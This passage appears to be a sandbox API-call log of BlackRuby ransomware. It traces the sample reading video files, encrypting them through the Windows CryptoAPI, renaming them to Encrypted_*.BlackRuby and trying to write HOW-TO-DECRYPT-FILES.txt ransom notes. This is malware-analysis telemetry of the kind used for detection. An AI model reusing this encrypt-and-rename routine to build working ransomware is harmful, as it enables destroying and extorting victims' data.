"c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\encrypted_jjnkmplk96flkujpehs9rtjecmgiaycqewtec3jeuc.blackruby")) returned 1 [0063.146] GetLastError () returned 0xb7 [0063.146] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0063.146] GetLastError () returned 0xb7 [0063.146] SetErrorMode (uMode=0x1) returned 0x0 [0063.146] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0063.147] GetLastError () returned 0x5 [0063.148] SetErrorMode (uMode=0x0) returned 0x1 [0063.148] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", lpFilePart=0x0) returned 0x51 [0063.148] GetLastError () returned 0x5 [0063.148] SetErrorMode (uMode=0x1) returned 0x0 [0063.148] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\kbidebj.mp4"), fInfoLevelId=0x0, lpFileInformation=0x1cab798 | out: lpFileInformation=0x1cab798*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdde247c0, ftCreationTime.dwHighDateTime=0x1d358dc, ftLastAccessTime.dwLowDateTime=0xea7ef6e0, ftLastAccessTime.dwHighDateTime=0x1d34f9f, ftLastWriteTime.dwLowDateTime=0xea7ef6e0, ftLastWriteTime.dwHighDateTime=0x1d34f9f, nFileSizeHigh=0x0, nFileSizeLow=0xb933)) returned 1 [0063.148] GetLastError () returned 0x5 [0063.148] SetErrorMode (uMode=0x0) returned 0x1 [0063.149] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", lpFilePart=0x0) returned 0x51 [0063.149] GetLastError () returned 0x5 [0063.149] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", lpFilePart=0x0) returned 0x51 [0063.149] GetLastError () returned 0x5 [0063.149] SetErrorMode (uMode=0x1) returned 0x0 [0063.149] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\kbidebj.mp4"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.149] GetLastError () returned 0x0 [0063.149] GetFileType (hFile=0x258) returned 0x1 [0063.149] SetErrorMode (uMode=0x0) returned 0x1 [0063.149] GetFileType (hFile=0x258) returned 0x1 [0063.149] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0xb933 [0063.149] GetLastError () returned 0x0 [0063.149] ReadFile (in: hFile=0x258, lpBuffer=0x1cad4bc, nNumberOfBytesToRead=0xb933, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1cad4bc*, lpNumberOfBytesRead=0x18ec40*=0xb933, lpOverlapped=0x0) returned 1 [0063.150] GetLastError () returned 0x0 [0063.150] CloseHandle (hObject=0x258) returned 1 [0063.150] GetLastError () returned 0x0 [0063.150] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", lpFilePart=0x0) returned 0x51 [0063.150] GetLastError () returned 0x0 [0063.150] SetErrorMode (uMode=0x1) returned 0x0 [0063.150] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\kbidebj.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdde247c0, ftCreationTime.dwHighDateTime=0x1d358dc, ftLastAccessTime.dwLowDateTime=0xea7ef6e0, ftLastAccessTime.dwHighDateTime=0x1d34f9f, ftLastWriteTime.dwLowDateTime=0xea7ef6e0, ftLastWriteTime.dwHighDateTime=0x1d34f9f, nFileSizeHigh=0x0, nFileSizeLow=0xb933)) returned 1 [0063.150] GetLastError () returned 0x0 [0063.150] SetErrorMode (uMode=0x0) returned 0x1 [0063.150] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c790) returned 1 [0063.151] GetLastError () returned 0x0 [0063.185] CryptImportKey (in: hProv=0x37c790, pbData=0x1d1eb10, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360f20) returned 1 [0063.185] GetLastError () returned 0x0 [0063.185] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.185] GetLastError () returned 0x0 [0063.193] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.193] GetLastError () returned 0x0 [0063.193] CryptDuplicateKey (in: hKey=0x360f20, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x360b60) returned 1 [0063.193] CryptContextAddRef (hProv=0x37c790, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.193] GetLastError () returned 0x0 [0063.193] CryptSetKeyParam (hKey=0x360b60, dwParam=0x4, pbData=0x1b57fd8*=0x1, dwFlags=0x0) returned 1 [0063.193] GetLastError () returned 0x0 [0063.193] CryptSetKeyParam (hKey=0x360b60, dwParam=0x1, pbData=0x1b57fa4, dwFlags=0x0) returned 1 [0063.193] GetLastError () returned 0x0 [0063.193] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b58020*, pdwDataLen=0x18ec30*=0xba30, dwBufLen=0xba30 | out: pbData=0x1b58020*, pdwDataLen=0x18ec30*=0xba30) returned 1 [0063.193] GetLastError () returned 0x0 [0063.193] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1b6f4ac*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1b6f4ac*, pdwDataLen=0x18ec48*=0x10) returned 1 [0063.193] GetLastError () returned 0x0 [0063.193] CryptEncrypt (in: hKey=0x360b60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1b6f4dc*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1b6f4dc*, pdwDataLen=0x18ec50*=0x10) returned 1 [0063.193] GetLastError () returned 0x0 [0063.194] CryptDestroyKey (hKey=0x360f20) returned 1 [0063.194] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.194] CryptReleaseContext (hProv=0x37c790, dwFlags=0x0) returned 1 [0063.194] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", lpFilePart=0x0) returned 0x51 [0063.194] GetLastError () returned 0x0 [0063.194] SetErrorMode (uMode=0x1) returned 0x0 [0063.194] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\kbidebj.mp4"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.195] GetLastError () returned 0xb7 [0063.195] GetFileType (hFile=0x258) returned 0x1 [0063.195] SetErrorMode (uMode=0x0) returned 0x1 [0063.195] GetFileType (hFile=0x258) returned 0x1 [0063.196] CloseHandle (hObject=0x258) returned 1 [0063.196] GetLastError () returned 0xb7 [0063.196] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4", lpFilePart=0x0) returned 0x51 [0063.197] GetLastError () returned 0xb7 [0063.197] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_inaVT9rBf9xe8P79x8G98RY9GFYRf70SbBY5qbFA.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_inaVT9rBf9xe8P79x8G98RY9GFYRf70SbBY5qbFA.BlackRuby", lpFilePart=0x0) returned 0x82 [0063.197] GetLastError () returned 0xb7 [0063.197] SetErrorMode (uMode=0x1) returned 0x0 [0063.197] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\kbidebj.mp4"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xdde247c0, ftCreationTime.dwHighDateTime=0x1d358dc, ftLastAccessTime.dwLowDateTime=0xea7ef6e0, ftLastAccessTime.dwHighDateTime=0x1d34f9f, ftLastWriteTime.dwLowDateTime=0x2ddbb220, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0xba40)) returned 1 [0063.197] GetLastError () returned 0xb7 [0063.197] SetErrorMode (uMode=0x0) returned 0x1 [0063.197] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\kBIdEbj.mp4" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\kbidebj.mp4"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_inaVT9rBf9xe8P79x8G98RY9GFYRf70SbBY5qbFA.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\encrypted_inavt9rbf9xe8p79x8g98ry9gfyrf70sbby5qbfa.blackruby")) returned 1 [0063.197] GetLastError () returned 0xb7 [0063.198] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0063.198] GetLastError () returned 0xb7 [0063.198] SetErrorMode (uMode=0x1) returned 0x0 [0063.198] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0063.198] GetLastError () returned 0x5 [0063.199] SetErrorMode (uMode=0x0) returned 0x1 [0063.199] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", nBufferLength=0x105, lpBuffer=0x18e848, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", lpFilePart=0x0) returned 0x50 [0063.199] GetLastError () returned 0x5 [0063.199] SetErrorMode (uMode=0x1) returned 0x0 [0063.199] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\pfcxwo.swf"), fInfoLevelId=0x0, lpFileInformation=0x1b984cc | out: lpFileInformation=0x1b984cc*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17fdb170, ftCreationTime.dwHighDateTime=0x1d3562f, ftLastAccessTime.dwLowDateTime=0x1c372930, ftLastAccessTime.dwHighDateTime=0x1d3552e, ftLastWriteTime.dwLowDateTime=0x1c372930, ftLastWriteTime.dwHighDateTime=0x1d3552e, nFileSizeHigh=0x0, nFileSizeLow=0x9b85)) returned 1 [0063.199] GetLastError () returned 0x5 [0063.199] SetErrorMode (uMode=0x0) returned 0x1 [0063.199] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", lpFilePart=0x0) returned 0x50 [0063.199] GetLastError () returned 0x5 [0063.199] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", nBufferLength=0x105, lpBuffer=0x18e6e4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", lpFilePart=0x0) returned 0x50 [0063.199] GetLastError () returned 0x5 [0063.199] SetErrorMode (uMode=0x1) returned 0x0 [0063.200] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\pfcxwo.swf"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.200] GetLastError () returned 0x0 [0063.200] GetFileType (hFile=0x258) returned 0x1 [0063.200] SetErrorMode (uMode=0x0) returned 0x1 [0063.200] GetFileType (hFile=0x258) returned 0x1 [0063.200] GetFileSize (in: hFile=0x258, lpFileSizeHigh=0x18ec98 | out: lpFileSizeHigh=0x18ec98*=0x0) returned 0x9b85 [0063.200] GetLastError () returned 0x0 [0063.200] ReadFile (in: hFile=0x258, lpBuffer=0x1b9a318, nNumberOfBytesToRead=0x9b85, lpNumberOfBytesRead=0x18ec40, lpOverlapped=0x0 | out: lpBuffer=0x1b9a318*, lpNumberOfBytesRead=0x18ec40*=0x9b85, lpOverlapped=0x0) returned 1 [0063.201] GetLastError () returned 0x0 [0063.201] CloseHandle (hObject=0x258) returned 1 [0063.201] GetLastError () returned 0x0 [0063.201] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", nBufferLength=0x105, lpBuffer=0x18e7f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", lpFilePart=0x0) returned 0x50 [0063.201] GetLastError () returned 0x0 [0063.201] SetErrorMode (uMode=0x1) returned 0x0 [0063.201] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\pfcxwo.swf"), fInfoLevelId=0x0, lpFileInformation=0x18eca8 | out: lpFileInformation=0x18eca8*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17fdb170, ftCreationTime.dwHighDateTime=0x1d3562f, ftLastAccessTime.dwLowDateTime=0x1c372930, ftLastAccessTime.dwHighDateTime=0x1d3552e, ftLastWriteTime.dwLowDateTime=0x1c372930, ftLastWriteTime.dwHighDateTime=0x1d3552e, nFileSizeHigh=0x0, nFileSizeLow=0x9b85)) returned 1 [0063.201] GetLastError () returned 0x0 [0063.201] SetErrorMode (uMode=0x0) returned 0x1 [0063.201] CryptAcquireContextW (in: phProv=0x18ec08, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ec08*=0x37c4e8) returned 1 [0063.201] GetLastError () returned 0x0 [0063.236] CryptImportKey (in: hProv=0x37c4e8, pbData=0x1c07e10, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ebe4 | out: phKey=0x18ebe4*=0x360ee0) returned 1 [0063.236] GetLastError () returned 0x0 [0063.236] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.236] GetLastError () returned 0x0 [0063.242] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.242] GetLastError () returned 0x0 [0063.242] CryptDuplicateKey (in: hKey=0x360ee0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18eba0 | out: phKey=0x18eba0*=0x3609e0) returned 1 [0063.242] CryptContextAddRef (hProv=0x37c4e8, pdwReserved=0x0, dwFlags=0x0) returned 1 [0063.242] GetLastError () returned 0x0 [0063.242] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x4, pbData=0x1c34e5c*=0x1, dwFlags=0x0) returned 1 [0063.242] GetLastError () returned 0x0 [0063.242] CryptSetKeyParam (hKey=0x3609e0, dwParam=0x1, pbData=0x1c34e28, dwFlags=0x0) returned 1 [0063.242] GetLastError () returned 0x0 [0063.242] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c34ea4*, pdwDataLen=0x18ec30*=0x9c80, dwBufLen=0x9c80 | out: pbData=0x1c34ea4*, pdwDataLen=0x18ec30*=0x9c80) returned 1 [0063.242] GetLastError () returned 0x0 [0063.242] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c487d0*, pdwDataLen=0x18ec48*=0x10, dwBufLen=0x10 | out: pbData=0x1c487d0*, pdwDataLen=0x18ec48*=0x10) returned 1 [0063.242] GetLastError () returned 0x0 [0063.242] CryptEncrypt (in: hKey=0x3609e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c48800*, pdwDataLen=0x18ec50*=0x0, dwBufLen=0x10 | out: pbData=0x1c48800*, pdwDataLen=0x18ec50*=0x10) returned 1 [0063.242] GetLastError () returned 0x0 [0063.242] CryptDestroyKey (hKey=0x360ee0) returned 1 [0063.242] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.242] CryptReleaseContext (hProv=0x37c4e8, dwFlags=0x0) returned 1 [0063.242] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", nBufferLength=0x105, lpBuffer=0x18e6ec, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", lpFilePart=0x0) returned 0x50 [0063.242] GetLastError () returned 0x0 [0063.242] SetErrorMode (uMode=0x1) returned 0x0 [0063.243] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\pfcxwo.swf"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x258 [0063.244] GetLastError () returned 0xb7 [0063.244] GetFileType (hFile=0x258) returned 0x1 [0063.244] SetErrorMode (uMode=0x0) returned 0x1 [0063.244] GetFileType (hFile=0x258) returned 0x1 [0063.245] CloseHandle (hObject=0x258) returned 1 [0063.245] GetLastError () returned 0xb7 [0063.245] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf", lpFilePart=0x0) returned 0x50 [0063.245] GetLastError () returned 0xb7 [0063.245] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_Cp3xXMTyuY9xuVRc1oeVZ6YInQaqOMkmBBHGmO2.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e810, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_Cp3xXMTyuY9xuVRc1oeVZ6YInQaqOMkmBBHGmO2.BlackRuby", lpFilePart=0x0) returned 0x81 [0063.245] GetLastError () returned 0xb7 [0063.245] SetErrorMode (uMode=0x1) returned 0x0 [0063.245] GetFileAttributesExW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\pfcxwo.swf"), fInfoLevelId=0x0, lpFileInformation=0x18ec90 | out: lpFileInformation=0x18ec90*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x17fdb170, ftCreationTime.dwHighDateTime=0x1d3562f, ftLastAccessTime.dwLowDateTime=0x1c372930, ftLastAccessTime.dwHighDateTime=0x1d3552e, ftLastWriteTime.dwLowDateTime=0x2de537a0, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x9c90)) returned 1 [0063.245] GetLastError () returned 0xb7 [0063.245] SetErrorMode (uMode=0x0) returned 0x1 [0063.245] MoveFileW (lpExistingFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\PFcxWo.swf" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\pfcxwo.swf"), lpNewFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\Encrypted_Cp3xXMTyuY9xuVRc1oeVZ6YInQaqOMkmBBHGmO2.BlackRuby" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\encrypted_cp3xxmtyuy9xuvrc1oevz6yinqaqomkmbbhgmo2.blackruby")) returned 1 [0063.246] GetLastError () returned 0xb7 [0063.246] GetFullPathNameW (in: lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e6f4, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x5e [0063.246] GetLastError () returned 0xb7 [0063.246] SetErrorMode (uMode=0x1) returned 0x0 [0063.247] CreateFileW (lpFileName="C:\\Users\\EEBsYm5\\Videos\\95H7zZlNqgP6_L-\\zSklx0w41Sf5f4Y7hUrw\\y0ANUVsX\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\users\\eebsym5\\videos\\95h7zzlnqgp6_l-\\zsklx0w41sf5f4y7hurw\\y0anuvsx\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0063.247] GetLastError () returned 0x5 